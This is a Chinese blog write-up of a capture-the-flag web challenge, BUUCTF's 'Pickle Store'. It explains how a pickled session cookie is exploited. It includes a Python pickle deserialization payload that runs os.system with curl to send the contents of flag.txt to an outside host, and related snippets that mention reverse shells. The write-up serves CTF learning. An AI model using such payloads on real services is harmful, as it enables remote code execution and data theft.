BUUCTF WEB PICKLE STORE

最新推荐文章于 2024-07-27 14:55:43 发布
最新推荐文章于 2024-07-27 14:55:43 发布
阅读量349 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/127127290
版权

这一题是一个简单的python反序列化,简单的写个脚本就好,没啥好说的
那么就来水一篇buuctf 小号靶机的使用
众所周知,buuctf靶场经历了内网K8S改造,导致以前的小号的内网靶机的方法出了问题,我也疑惑了很久,该怎么去用这台不知道公网ip的靶机
后来我想明白了,给的是apache2的公网ip,那就直接外带啊,果然成功了,哈哈。。
不说废话了,先来看看这题,在买东西的时候抓包看cookie是常规操作:
抓到的包里cookie:

session=gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu

看着像base64,解码一下,发现一个标志:anti_tamper_hmac
无法逆向的hmac,那么结合题目的pickle,八九不离十的猜是反序列化
关于pickle的指令解析可以看这个师傅的
https://blog.csdn.net/weixin_45669205/article/details/116274988
反正构造就完事了

class A(object):
	def __reduce(self):
		return(eval,("__import__('os').system('curl http://6c59e8a3-c4c8-46fc-9875-d658ec5cc0eb.node4.buuoj.cn:81/`cat flag.txt`')",))
a=A()
print(pickle.dumps(a))
print(base64.b64encode(pickle.dumps(a)))

外带成功,撒花!

[watevrCTF-2019]Pickle Store
Kradress的博客
02-11 1896
目录思路题解总结 思路 先抓个包看看,里面有个session base64解码后拿到一串乱码,根据题目可以得知考点是pickle反序列化 import base64 import pickle print(pickle.loads(base64.b64decode("gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTY
C#直接读取Pickle类型权重
最新发布
08-20
C#直接读取Pickle类型权重,该类权重扩展名一般为.bin, .pth, .pkl, .pt,方便C#环境直接加载较为通用的权重文件,降低C#开发深度学习项目的难度
BUUCTF:[watevrCTF-2019]Pickle Store
末初的CSDN博客
07-26 1218
题目地址:https://buuoj.cn/challenges#[watevrCTF-2019]Pickle%20Store Pickle反序列化 使用pickle.loads()和base64对这串字符进行解码反序列化 利用Pickle反序列化exp反弹shell 在Buu的小号上开一台内网靶机 import base64 import pickle class A(object): def __reduce__(self): return (eval, ("__imp
BUUCTF--[watevrCTF-2019]Pickle Store
qq_46263951的博客
08-08 445
一般看到商店需要购买flag的直接就会想到session和cookie 我们先将session的值来接
BUUCTF pickle反序列化漏洞
09-07
BUUCTF中,有一个题目叫做"Pickle Store",该题目利用了pickle模块的反序列化功能,并在反序列化的过程中执行了恶意代码。具体的攻击方法是,通过抓包获取到一个包含pickle字符串的session值,然后对这个字符串...
Python使用pickle模块存储数据报错解决示例代码
12-25
本文研究的主要是Python使用pickle模块存储数据报错解决方法,以代码的形式展示,具体如下。 首先来了解下pickle模块 pickle提供了一个简单的持久化功能。可以将对象以文件的形式存放在磁盘上。 pickle模块只能在...
python pickle存储、读取大数据量列表、字典数据的方法
09-19
Python的`pickle`模块是处理序列化和反序列化的强大工具,它能够将Python对象转换为字节流,以便存储或在网络上传输,然后再将这些字节流恢复为原始对象。这对于处理大数据量的列表和字典尤其有用,特别是当需要在...
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 963
详细讲解pickle
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1986
[RoarCTF 2019]Easy Java
BUUCTF靶场练习——第一周
weixin_47063945的博客
07-15 1483
整理了buuctf靶场前6道web题目的writeup并整理了涉及到的部分知识的整理和扩展
[极客大挑战 2019]Http BUUCTF靶场
叶子的Blog
10-15 533
基础知识 Http参数详解 手动解题 查看页面源码发现隐藏链接 访问Secret.php 这个题的出题点应该是要修改http包内参数的内容,这句话就是要修改referer参数为www.Sycsecret.com,使用bp抓包 解题成功 脚本解题方法 import requests url = 'http://node4.buuoj.cn:26684/Secret.php' header = {'Referer':'https://www.Sycsecret.co..
BUUCTF靶场初试
qq_62056583的博客
07-27 299
可以看到建立了连接,然后启动连接并且输入提示的密码,进入目录后查看并找到了flag.txt文件打开就可以看到了flag。打开题目开启靶机环境,根据提示是一个ssh链接,我们直接启动ssh连接。ssh -p 端口 root@node5.buuoj.cn。BUUCTF—基础篇—Linux Labs。
BUUCTF(10.25-11.1)
XINO
11-23 4218
[GWCTF 2019]我有一个数据库 考点是phpmyadmin 进入该页面 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 先测试能不能用该数据库 payload ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 发现有回显后我们改成flag http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?
buuctf (buyflag)
ANYOUZHEN的博客
05-21 474
打开靶机后有个menu,点击里面的payflag看看 查看源代码看看 ~~~post money and password~~~ if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password == 404) { ...
BUUCTF Linux Labs
李二胖的博客
10-11 2065
首先启动靶机,如上图所示,可以获得登录链接和端口号 使用ssh root@node4.buuoj.cn 26740可以登录靶机,后续结果操作如下图获得flag.txt打印输出获得结果
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值